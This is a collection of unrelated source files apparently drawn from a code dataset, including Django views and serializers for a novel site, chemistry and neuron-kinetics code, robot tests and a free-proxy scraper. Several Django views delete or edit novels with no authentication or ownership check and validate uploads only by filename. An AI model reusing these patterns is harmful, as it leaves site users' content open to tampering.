render(request, 'novels_chapter.html', context={\n 'novel': Novel.objects.get(pk=novels_title_pk),\n 'author': User.objects.get(username=Novel.objects.get(pk=novels_title_pk).author),\n 'novels_chapter': novels_chapter,\n 'novels_chapter_words': len(novels_chapter.chapter_content),\n 'novel_words': novel_words,\n 'novels_title_pk': novels_title_pk,\n 'novel_type': novel_type,\n 'chapters': chapters,\n 'last_chapters': last_chapters,\n 'last_novel': last_novel,\n 'previous_chapter': previous_chapter,\n 'next_chapter': next_chapter\n })\n response.set_cookie(cookies_key, 'true')\n return response\n else:\n novels = Novel.objects.all()\n context = get_novel_common_data(request, novels, 18)\n context['msg'] = '无搜索结果'\n context['tip'] = '发生错误'\n return render(request, '404.html', context)\n\n\ndef novels_with_type(request, novels_type_pk):\n sort = request.GET.get('sort', 'create_time')\n novel_type = get_object_or_404(NovelType, pk=novels_type_pk)\n novels = Novel.objects.filter(novel_type=novel_type)\n if sort == 'create_time':\n novels = Novel.objects.filter(novel_type=novel_type)\n elif sort == 'click_num':\n novels = Novel.objects.filter(novel_type=novel_type).order_by('-read_num__read_num')\n elif sort == 'like_num':\n novels = Novel.objects.filter(novel_type=novel_type).order_by('-like_count__like_num')\n elif sort == 'read_num':\n novels = Novel.objects.filter(novel_type=novel_type).order_by('-read_count__read_num')\n context = get_novel_common_data(request, novels)\n context['sort'] = sort\n context['novel_type'] = novel_type\n context['novels_type_pk'] = novels_type_pk\n return render(request, 'novels_with_type.html', context)\n\n\ndef novels_with_date(request, year, month):\n novels = Novel.objects.filter(create_time__year=year, create_time__month=month)\n context = get_novel_common_data(request, novels)\n context['novels_with_date'] = '%s年%s月' % (year, month)\n return render(request, 'novels_with_date.html', context)\n\n\ndef novels_with_search(request):\n novels_title = request.GET.get('novel_title', '')\n sort = request.GET.get('sort', 'create_time')\n novels = Novel.objects.filter(title__icontains=novels_title)\n if novels_title == '' or not novels.exists():\n novels = Novel.objects.all()\n context = get_novel_common_data(request, novels, 18)\n context['msg'] = '无搜索结果'\n context['tip'] = '搜索'\n context['other_title'] = '最近更新'\n return render(request, '404.html', context)\n else:\n if sort == 'create_time':\n novels = Novel.objects.filter(title__icontains=novels_title)\n elif sort == 'click_num':\n novels = Novel.objects.filter(title__icontains=novels_title).order_by('-read_num__read_num')\n elif sort == 'like_num':\n novels = Novel.objects.filter(title__icontains=novels_title).order_by('-like_count__like_num')\n elif sort == 'read_num':\n novels = Novel.objects.filter(title__icontains=novels_title).order_by('-read_count__read_num')\n context = get_novel_common_data(request, novels)\n context['sort'] = sort\n context['novels_title'] = novels_title\n return render(request, 'novels_with_search.html', context)\n\n\ndef novels_with_write(request):\n return render(request, 'novels_with_write.html', context={\n 'novel_types': NovelType.objects.all()\n })\n\n\ndef publish_title(request):\n title = request.GET.get('title', '').strip()\n if Novel.objects.filter(title=title).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'active': 'uk-form-danger'\n })\n else:\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'active': 'uk-form-success'\n })\n\n\ndef update_title(request):\n title = request.GET.get('title', '').strip()\n first_title = request.GET.get('first_title', '').strip()\n if title != first_title:\n if Novel.objects.filter(title=title).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'active': 'uk-form-danger'\n })\n else:\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'active': 'uk-form-success'\n })\n else:\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'active': 'uk-form-success'\n })\n\n\ndef novels_with_publish(request):\n title = request.POST.get('title', '').strip()\n novel_type = request.POST.get('novel_type', '')\n introduction = request.POST.get('introduction', '').replace('\\n', '
      ')\n chapter_title = request.POST.get('chapter_title', '').strip()\n chapter_content = request.POST.get('chapter_content', '').replace('\\n', '
      ')\n if title == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品名不能为空'\n })\n elif chapter_title == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '章节名不能为空'\n })\n elif novel_type == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '类型没有选择'\n })\n elif introduction == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '简介不能为空'\n })\n elif chapter_content == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '内容不能为空'\n })\n elif Novel.objects.filter(title=title).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品名已存在'\n })\n elif not NovelType.objects.filter(type_name=novel_type).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品类型不存在'\n })\n else:\n novel_type = NovelType.objects.get(type_name=novel_type)\n Novel.objects.create(title=title, author=request.user, novel_type=novel_type,\n introduction=introduction)\n novel_title = Novel.objects.get(title=title)\n NovelChapter.objects.create(novel_title=novel_title, chapter_title=chapter_title,\n chapter_content=chapter_content)\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'msg': '发布成功'\n })\n\n\ndef novels_my_write(request):\n if request.user.is_authenticated:\n novel = get_object_or_404(User, username=request.user.username)\n novels = novel.user.all()\n context = get_novel_common_data(request, novels, 18)\n return render(request, 'novels_my_write.html', context)\n else:\n return render(request, 'novels_my_write.html', context={})\n\n\ndef novels_with_cmt(request, novels_title_pk):\n novel = Novel.objects.get(pk=novels_title_pk)\n novel_content_type = ContentType.objects.get_for_model(Novel)\n return render(request, 'novels_with_cmt.html', context={\n 'novels_title_pk': novels_title_pk,\n 'novel': novel,\n 'content_type': novel_content_type.model\n })\n\n\ndef novels_with_add(request, novels_title_pk):\n if request.user.is_authenticated:\n novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n novels_chapters_count = novel_title.novel.all().count()\n return render(request, 'novels_with_add.html', context={\n 'novels_chapters_count': novels_chapters_count + 1,\n 'novels_title_pk': novels_title_pk\n })\n else:\n return render(request, 'novels_with_add.html', context={})\n\n\ndef novels_with_del(request):\n novels_title_pk = request.POST.get('novels_title_pk', '')\n if novels_title_pk == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '没有作品被选中'\n })\n else:\n Novel.objects.filter(pk=novels_title_pk).delete()\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'msg': '删除成功'\n })\n\n\ndef add_chapter(request):\n novels_title_pk = request.POST.get('novels_title_pk', '').strip()\n chapter_title = request.POST.get('chapter_title', '').strip()\n chapter_num = request.POST.get('chapter_num', '').strip()\n chapter_content = request.POST.get('chapter_content', '').replace('\\n', '
      ')\n if novels_title_pk == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品不能为空'\n })\n elif chapter_title == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '章节名不能为空'\n })\n elif chapter_num == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '章节数不能为空'\n })\n elif chapter_content == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '内容不能为空'\n })\n else:\n novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n NovelChapter.objects.create(novel_title=novel_title, chapter_title=chapter_title, chapter_num=chapter_num,\n chapter_content=chapter_content)\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'msg': '发布成功'\n })\n\n\ndef novels_with_edit(request, novels_title_pk):\n if request.user.is_authenticated:\n novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n if request.user == Novel.objects.get(pk=novels_title_pk).author:\n novels_chapters = novel_title.novel.all() # 小说所有章节\n last_novel = NovelChapter.objects.filter(novel_title=novel_title).last()\n chapters = []\n last_chapters = {}\n if last_novel.chapter_num > 10:\n times = int(str(last_novel.chapter_num)[:1])\n for i in range(times):\n chapters.append({\n 'chapter_title': novels_chapters[i * 10:i * 10 + 10],\n 'start_chapter': i * 10 + 1,\n 'end_chapter': i * 10 + 10,\n })\n last_chapters['last_chapters_title'] = novels_chapters[times * 10:last_novel.chapter_num + 1]\n last_chapters['last_chapter_start'] = times * 10 + 1\n last_chapters['last_chapter_end'] = last_novel.chapter_num\n else:\n last_chapters['last_chapters_title'] = novels_chapters[:last_novel.chapter_num + 1]\n last_chapters['last_chapter_start'] = 1\n last_chapters['last_chapter_end'] = last_novel.chapter_num\n return render(request, 'novels_with_edit.html', context={\n 'novels_title_pk': novels_title_pk,\n 'novel': Novel.objects.get(title=novel_title),\n 'novel_types': NovelType.objects.all(),\n 'chapters': chapters,\n 'first_chapters': NovelChapter.objects.filter(novel_title=novel_title).first(),\n 'last_chapters': last_chapters\n })\n else:\n novels = Novel.objects.all()\n context = get_novel_common_data(request, novels, 18)\n context['msg'] = '用户错误'\n return render(request, '404.html', context)\n else:\n return render(request, 'novels_with_edit.html', context={})\n\n\ndef upload_cover(request):\n cover = request.FILES.get('cover')\n novels_title_pk = request.POST.get('novels_title_pk', '')\n if not re.match(r'^.*?(png|jpg|bmp|gif|jepg)$', cover.name):\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '图片格式不正确'\n })\n else:\n name = get_random_str() + cover.name\n novels = Novel.objects.get(pk=novels_title_pk)\n novels.cover = 'cover/' + name\n novels.save()\n\n fname = settings.MEDIA_ROOT + '/cover/' + name\n with open(fname, 'wb') as file:\n for i in cover.chunks():\n file.write(i)\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'msg': '修改成功'\n })\n\n\ndef get_chapter(request):\n novels_title_pk = request.GET.get('novels_title_pk', '').strip()\n chapter_num = request.GET.get('chapter_num', '').strip()\n if chapter_num == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '章节不能为空'\n })\n else:\n novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n novels_chapter = NovelChapter.objects.filter(novel_title=novel_title, chapter_num=chapter_num)\n data = json.loads(serializers.serialize(\"json\", novels_chapter))\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'novels_chapter': data[0]['fields']\n })\n\n\ndef edit_chapter(request):\n novels_title_pk = request.POST.get('novels_title_pk', '')\n title = request.POST.get('title', '').strip()\n is_end = request.POST.get('is_end', 0)\n novel_type = request.POST.get('novel_type', '').strip()\n notice = request.POST.get('notice', '暂无公告')\n introduction = request.POST.get('introduction', '暂无简介')\n chapter_num = request.POST.get('chapter_num', '').strip()\n chapter_title = request.POST.get('chapter_title', '').strip()\n chapter_content = request.POST.get('chapter_content', '').replace('\\n', '
      ')\n if novels_title_pk == '' or chapter_num == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '没有小说被选中'\n })\n elif title == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品名不能为空'\n })\n elif novel_type == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '没有选择类型'\n })\n elif chapter_num == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '章节数不能为空'\n })\n elif chapter_title == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '章节名不能为空'\n })\n elif chapter_content == '':\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '内容不能为空'\n })\n elif not Novel.objects.filter(pk=novels_title_pk).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品不存在'\n })\n if title != Novel.objects.get(pk=novels_title_pk).title:\n if Novel.objects.filter(title=title).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品名已存在'\n })\n if not NovelType.objects.filter(type_name=novel_type).exists():\n return JsonResponse(data={\n 'status': 'ERR',\n 'msg': '作品类型不存在'\n })\n else:\n novel_type = NovelType.objects.get(type_name=novel_type)\n novel = Novel.objects.get(pk=novels_title_pk)\n novel.title = title\n novel.is_end = is_end\n novel.author = request.user\n novel.novel_type = novel_type\n novel.introduction = introduction\n novel.notice = notice\n novel.save()\n\n novel_title = Novel.objects.get(pk=novels_title_pk)\n novels_chapter = NovelChapter.objects.get(novel_title=novel_title, chapter_num=chapter_num)\n novels_chapter.novel_title = novel_title\n novels_chapter.chapter_title = chapter_title\n novels_chapter.chapter_content = chapter_content\n novels_chapter.save()\n\n return JsonResponse(data={\n 'status': 'SUCCESS',\n 'msg': '保存成功'\n })\n\n\ndef novels_my_read(request):\n if request.user.is_authenticated:\n user = Profile.objects.get(user=request.user)\n novels = user.novels.all()\n for novel in novels:\n novel.count = NovelChapter.objects.filter(novel_title=novel.pk).count()\n context = get_novel_common_data(request, novels)\n return render(request, 'novels_my_read.html', context)\n else:\n return render(request, 'novels_my_read.html', context={})\n","sub_path":"novel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58342005","text":"from stk.utilities import periodic_table\n\n\ndef _with_structure_from_turbomole(self, path):\n \"\"\"\n Return a clone, with its structure taken from a Turbomole file.\n\n Note that coordinates in ``.coord`` files are given in Bohr.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.coord`` file from which the\n structure should be updated.\n\n Returns\n -------\n :class:`.Molecule`\n A clone with atomic positions found in `path`.\n\n Raises\n ------\n :class:`RuntimeError`\n If the number of atoms in the file does not match the\n number of atoms in the molecule or if atom elements in the\n file do not agree with the atom elements in the molecule.\n\n \"\"\"\n\n bohr_to_ang = 0.5291772105638411\n\n with open(path, 'r') as f:\n _, *content, __ = f.readlines()\n\n # Check the atom count is correct.\n num_atoms = len(self._atoms)\n if len(content) != num_atoms:\n raise RuntimeError(\n 'The number of atoms in the coord file, '\n f'{len(content)}, does not match the number of atoms '\n f'in the molecule, {num_atoms}.'\n )\n\n # Save all the coords in the file.\n new_coords = []\n for i, line in enumerate(content):\n *coords, element = line.split()\n if element.isnumeric():\n element = periodic_table[int(element)]\n\n if element != self._atoms[i].__class__.__name__:\n raise RuntimeError(\n f'Atom {i} element does not match file.'\n )\n\n new_coords.append([float(i)*bohr_to_ang for i in coords])\n\n # Check that the correct number of atom\n # lines was present in the file.\n if i+1 != num_atoms:\n raise RuntimeError(\n 'The number of atoms lines in the coord file, '\n f'{i+1}, does not match the number of atoms '\n f'in the molecule, {num_atoms}.'\n )\n\n # Update the structure.\n return self._with_position_matrix(new_coords)\n","sub_path":"src/stk/molecular/molecules/molecule/utilities/updaters/turbomole.py","file_name":"turbomole.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"15454561","text":"from gpiozero import LineSensor\n\n\nclass SensorDeLinha:\n # Esse contrutor não recebe pinagem pois ficara fixo a posição do sensor, por enquanto indo do pinos GPIO5\n # ou 29 na placa até o GPIO26 ou 37\n def __init__(self): \n self.sensor = [0,0,0,0,0]\n try:\n self.sensor[0] = LineSensor(5)\n self.sensor[1] = LineSensor(6)\n self.sensor[2] = LineSensor(13)\n self.sensor[3] = LineSensor(19)\n self.sensor[4] = LineSensor(26)\n except:\n print(\"Sensores não conectados corretamente\")\n\n def getValue(self, numSensor):\n return self.sensor[numSensor].value\n\n","sub_path":"ProgrammingToTeach/API-Connection/linha.py","file_name":"linha.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"322096484","text":"import os\nimport sys\nfrom pathlib import Path\nfrom unittest.mock import MagicMock, patch, PropertyMock\nimport pytest\nfrom opentrons.api import Session\nfrom opentrons.hardware_control import ThreadedAsyncLock\n\nfrom robot_server.service.protocol.protocol import UploadedProtocol, \\\n UploadedProtocolMeta, FileMeta\nfrom robot_server.service.session.session_types.protocol.execution. \\\n protocol_runner import ProtocolRunnerContext, ProtocolRunner\n\n\n@pytest.fixture\ndef mock_os_chdir():\n with patch.object(os, \"chdir\") as p:\n yield p\n\n\n@pytest.fixture\ndef uploaded_protocol_meta():\n mock_temp_dir = MagicMock()\n type(mock_temp_dir).name = PropertyMock(return_value=\"some_path\")\n return UploadedProtocolMeta(identifier=\"None\",\n protocol_file=FileMeta(\n path=Path(\"/some_path/abc.py\"),\n content_hash=\"\"\n ),\n directory=mock_temp_dir\n )\n\n\n@pytest.fixture\ndef mock_protocol(uploaded_protocol_meta):\n m = MagicMock(spec=UploadedProtocol)\n type(m).meta = PropertyMock(return_value=uploaded_protocol_meta)\n m.get_contents.return_value = \"my contents\"\n return m\n\n\n@pytest.fixture\ndef mock_context():\n with patch('robot_server.service.session.session_types.protocol'\n '.execution.protocol_runner.ProtocolRunnerContext') as p:\n yield p\n\n\n@pytest.fixture\ndef protocol_runner(mock_protocol, loop, hardware):\n return ProtocolRunner(protocol=mock_protocol,\n loop=loop,\n hardware=hardware,\n motion_lock=ThreadedAsyncLock())\n\n\ndef test_load(protocol_runner, mock_context,\n uploaded_protocol_meta, mock_protocol):\n with patch.object(Session, \"build_and_prep\") as mock:\n protocol_runner.load()\n mock_context.assert_called_once()\n mock.assert_called_once_with(\n name=uploaded_protocol_meta.protocol_file.path.name,\n contents=mock_protocol.get_contents(),\n hardware=protocol_runner._hardware,\n loop=protocol_runner._loop,\n broker=protocol_runner._broker,\n motion_lock=protocol_runner._motion_lock,\n extra_labware={})\n\n\n@pytest.mark.parametrize(argnames=\"func\",\n argvalues=[ProtocolRunner.run,\n ProtocolRunner.simulate,\n ProtocolRunner.cancel,\n ProtocolRunner.pause,\n ProtocolRunner.resume])\ndef test_no_session_will_not_raise(func, protocol_runner, mock_context):\n func(protocol_runner)\n mock_context.assert_not_called()\n\n\n@pytest.mark.parametrize(argnames=\"func,target\",\n argvalues=[[ProtocolRunner.run, \"run\"],\n [ProtocolRunner.simulate, \"refresh\"],\n [ProtocolRunner.cancel, \"stop\"],\n [ProtocolRunner.pause, \"pause\"],\n [ProtocolRunner.resume, \"resume\"]])\ndef test_session_calls(func, target, protocol_runner, mock_context):\n protocol_runner._session = MagicMock()\n func(protocol_runner)\n getattr(protocol_runner._session, target).assert_called_once()\n\n\ndef test_listeners(protocol_runner):\n results1 = []\n results2 = []\n protocol_runner.add_listener(results1.append)\n protocol_runner.add_listener(results2.append)\n protocol_runner._on_message(1)\n protocol_runner._on_message(2)\n assert results1 == [1, 2] == results2\n\n protocol_runner.remove_listener(results2.append)\n protocol_runner._on_message(3)\n assert results1 == [1, 2, 3]\n assert results2 == [1, 2]\n\n\ndef test_protocol_runner_context(mock_protocol, uploaded_protocol_meta,\n mock_os_chdir):\n with ProtocolRunnerContext(mock_protocol) as context:\n # We are changing directory to the temp directory\n mock_os_chdir.assert_called_with(\n uploaded_protocol_meta.directory.name\n )\n # Adding it to sys.path\n assert uploaded_protocol_meta.directory.name in sys.path\n\n # Done with context manager. Let's make sure we clean up\n assert uploaded_protocol_meta.directory.name not in sys.path\n assert sys.path == context._path\n mock_os_chdir.assert_called_with(context._cwd)\n","sub_path":"robot-server/tests/service/session/session_types/protocol/execution/test_protocol_runner.py","file_name":"test_protocol_runner.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"81753093","text":"from rest_framework import serializers\nfrom restaurants.models import Restaurant, Item\nfrom django.contrib.auth.models import User\n\nclass RegisterSerializer(serializers.ModelSerializer):\n password = serializers.CharField(write_only=True)\n class Meta:\n model = User\n fields = ['username', 'email' ,'password']\n def create(self, validated_data):\n my_username = validated_data['username']\n my_email = validated_data['email']\n my_password = validated_data['password']\n new_user = User(username=my_username, email= my_email)\n new_user.set_password(my_password)\n new_user.save()\n return validated_data\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email',]\n\nclass ItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = Item\n fields = ['name', 'description', 'price',]\n\nclass RestaurantListSerializer(serializers.ModelSerializer):\n detail = serializers.HyperlinkedIdentityField(\n view_name = \"api-detail\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n update = serializers.HyperlinkedIdentityField(\n view_name = \"api-update\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n delete = serializers.HyperlinkedIdentityField(\n view_name = \"api-delete\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n\n class Meta:\n model = Restaurant\n fields = [\n 'name',\n 'opening_time',\n 'closing_time',\n 'detail',\n 'update',\n 'delete',\n ]\n\n\nclass RestaurantDetailSerializer(serializers.ModelSerializer):\n update = serializers.HyperlinkedIdentityField(\n view_name = \"api-update\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n delete = serializers.HyperlinkedIdentityField(\n view_name = \"api-delete\",\n lookup_field = \"id\",\n lookup_url_kwarg = \"restaurant_id\"\n )\n owner = UserSerializer()\n items = serializers.SerializerMethodField()\n\n class Meta:\n model = Restaurant\n fields = [\n 'id',\n 'owner',\n 'name',\n 'description',\n 'opening_time',\n 'closing_time',\n 'update',\n 'delete',\n 'items',\n ]\n\n def get_items(self, obj):\n items = Item.objects.filter(restaurant=obj)\n item_list = ItemSerializer(items, many=True).data\n return item_list\n\nclass RestaurantCreateUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = Restaurant\n fields = [\n 'name',\n 'description',\n 'opening_time',\n 'closing_time',\n ]","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"184146968","text":"#-*- coding:utf-8 -*-\nimport requests\nimport bs4\nimport json\nimport re\nimport os\nimport threading\nimport time\nfrom implement_dt import Tackle_dt\n\nheaders = {\n 'User-Agent':'\"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) '\n 'AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20\",',\n}\n\n# 西刺代理\ndef fetch_xici():\n '''\n download ip from xici website\n '''\n # 连接数据库\n tackle_dt = Tackle_dt()\n url = 'http://www.xicidaili.com/wt'\n page_content = requests.get(url,headers=headers)\n str_content = page_content.text\n soup = bs4.BeautifulSoup(str_content,'lxml')\n # 筛选出所有包含 ip 的 tr 标签\n tr_list = soup.find_all('tr',attrs={'class':['odd','']})\n # 编译 ip 地址正则表达式\n ip_rule = re.compile(r'(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3})')\n # 编译 ip 端口正则表达式\n port_rule = re.compile(r'\\>(\\d+)\\<')\n for tr in tr_list:\n str_tr = str(tr)\n re_m = re.search(r'HTTP',str_tr)\n if re_m:\n dic1 = {}\n # 匹配 ip 地址\n ip = re.findall(ip_rule,str_tr)[0]\n # 匹配端口\n port = re.findall(port_rule,str_tr)[0]\n # 组装为可用的 ip 地址\n dic1[\"http\"] = \"http://\" + ip + \":\" + port\n # 验证 ip 是否可用\n if verify_ip(dic1):\n # 验证可用后存入数据库\n tackle_dt.insert_ip(dic1)\n\n# =================================================================================\n\n# 有代理网\ndef fetch_udaili():\n '''从有代理网下载 IP'''\n # 连接数据库\n tackle_dt = Tackle_dt()\n # 网页请求解析\n url = 'http://www.youdaili.net/Daili/http/29487.html'\n page_content = requests.get(url, headers=headers)\n str_content = page_content.text\n soup = bs4.BeautifulSoup(str_content, 'lxml')\n p_tags = soup.find_all('p')\n # 匹配 IP\n rule = re.compile(r'(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}:\\d+)')\n for p in p_tags:\n try:\n ip = re.findall(rule,str(p))[0]\n dic = {}\n if ip:\n dic[\"http\"] = \"http://\"+ip\n if verify_ip(dic):\n print(dic)\n tackle_dt.insert_ip(dic)\n\n except:\n pass\n\n# =========================================================================\n# 66代理\n\nheaders1 = {\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Encoding':'gzip, deflate, sdch',\n 'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.6',\n 'Connection':'keep-alive',\n 'Cookie':'__cfduid=dc82e63a299dce97b98b94d949f5a9bb61484641816;'\n ' CNZZDATA1253901093=1728273565-1484639487-http%253A%252F%252Fwww.baidu.com%252F%7C1484701785; '\n 'Hm_lvt_1761fabf3c988e7f04bec51acd4073f4=1484646251,1484646378,1484702884,1484703157; '\n 'Hm_lpvt_1761fabf3c988e7f04bec51acd4073f4=1484704429',\n 'Host':'www.66ip.cn',\n 'Referer':'http://www.66ip.cn/pt.html',\n 'Upgrade-Insecure-Requests':'1',\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'\n }\ndef fetch_ss():\n tackle_dt = Tackle_dt()\n url = 'http://www.66ip.cn/mo.php?tqsl=50'\n page_content = requests.get(url, headers=headers1)\n str_content = page_content.text\n rule = re.compile(r'(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}:\\d+)')\n result = re.findall(rule,str_content)\n for ip in result:\n dic = {}\n dic[\"http\"] = \"http://\"+ip\n if verify_ip(dic):\n print(dic)\n tackle_dt.insert_ip(dic)\n\n\n# 首次验证 ip 是否可用\ndef verify_ip(dic):\n proxies = dic\n fixed_url = 'http://www.baidu.com/'\n try:\n res = requests.get(fixed_url,proxies=proxies,timeout=2)\n # print(res.text)\n if 'STATUS OK' in res.text:\n return True\n else:\n return False\n except:\n return False\n\n# 多线程\nfuncs = [fetch_xici,fetch_udaili,fetch_ss]\ndef download_ip():\n print('begin crawling ip')\n threads = []\n for i in range(len(funcs)):\n t = threading.Thread(target=funcs[i])\n threads.append(t)\n for i in range(len(funcs)):\n threads[i].start()\n for i in range(len(funcs)):\n threads[i].join()\n print('finish crawling ip')\n\n\ndownload_ip()\n# if __name__ == '__main__':\n# while True:\n# print('crawling...')\n# main()\n# print('resting...')\n# # 休息一分钟\n# time.sleep(60)\n","sub_path":"crwal_recuit_websites/fetch_ip.py","file_name":"fetch_ip.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"553682905","text":"# exec(open('../../Compilations/Kinetics/K_D_Chan_Custom1.py').read())\n#KD channel taken from mod files of Migliore2018: kdb.mod\n# Problems:\n\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport moose\nimport matplotlib.pyplot as plt\n\n#######################################################################\nn_vhalf_inf, n_slope_inf, n_A, n_B, n_C, n_D, n_E, n_F = -0.033,-0.0087666, -3.28572168e-02, 3.39951757e-02, 2.08825526e-17, 8.37522423e-14, 1.65077372e-02, 4.08034957e-01\n\n#######################################################################\n\nSOMA_A = 3.14e-8\nF = 96485.3329\nR = 8.314\ncelsius = 32\ndt = 0.05e-3\nENa = 0.092\nEK = -0.099\nEh = -0.030\nECa = 0.140\nEm = -0.065\n\nVmin = -0.100\nVmax = 0.100\nVdivs = 3000\n# dV = (Vmax-Vmin)/Vdivs\n# v = np.arange(Vmin,Vmax, dV)\nv = np.linspace(Vmin,Vmax, Vdivs)\nCamin = 1e-12\nCamax = 3\nCadivs = 4000\n# dCa = (Camax-Camin)/Cadivs\n# ca = np.arange(Camin,Camax, dCa)\nca = np.linspace(Camin,Camax, Cadivs)\n\ndef ChanGate(v,vhalf_inf, slope_inf, A, B, C, D, E, F):\n # alge model\n Inf = 1/(1+np.exp((v-vhalf_inf)/-slope_inf))\n yl = (v-A)/-B\n yr = (v-A)/E\n Tau = (C + (1 + yl/(np.sqrt(1+yl**2)))/2) * (D + (1 + yr/(np.sqrt(1+yr**2)))/2) * F\n Tau[Tau<0.00002] = 0.00002\n return [Inf,Tau]\n\ndef K_D_Chan(name):\n K_D = moose.HHChannel( '/library/' + name )\n K_D.Ek = EK\n K_D.Gbar = 300.0*SOMA_A\n K_D.Gk = 0.0\n K_D.Xpower = 1.0\n K_D.Ypower = 0.0\n K_D.Zpower = 0\n\n [nInf,nTau] = ChanGate(v,*[n_vhalf_inf, n_slope_inf, n_A, n_B, n_C, n_D, n_E, n_F])\n\n xgate = moose.element( K_D.path + '/gateX' )\n xgate.min = Vmin\n xgate.max = Vmax\n xgate.divs = Vdivs\n xgate.tableA = nInf/nTau\n xgate.tableB = 1.0/nTau\n\n return K_D\n\n\nif __name__ == \"__main__\":\n [nInf,nTau] = ChanGate(v,*[n_vhalf_inf, n_slope_inf, n_A, n_B, n_C, n_D, n_E, n_F])\n plt.figure()\n plt.plot(v, nInf, label='nInf')\n plt.ylabel('Inf')\n plt.legend()\n plt.figure()\n plt.plot(v, nTau, label='nTau')\n plt.ylabel('Tau')\n plt.legend()\n plt.show()","sub_path":"Kinetics/K_D_Chan_Custom2.py","file_name":"K_D_Chan_Custom2.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"482514787","text":"import tkinter as tk\nimport psutil\nfrom InputFunctions import get_car_info, get_lap_info\n\n\ndef counter_label(textlabel):\n def count():\n textlabel.config(text=str(get_car_info()[3]))\n textlabel.after(1, count)\n\n count()\n\n\nroot = tk.Tk()\nroot.title(\"CruiseControl Info\")\nlabel = tk.Label(root)\nlabel.pack()\ncounter_label(label)\nroot.mainloop()\n","sub_path":"neuro/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379544523","text":"# MIT License\n# \n# Copyright (c) 2020 Pierre-Yves Camille Regis Taunay\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE 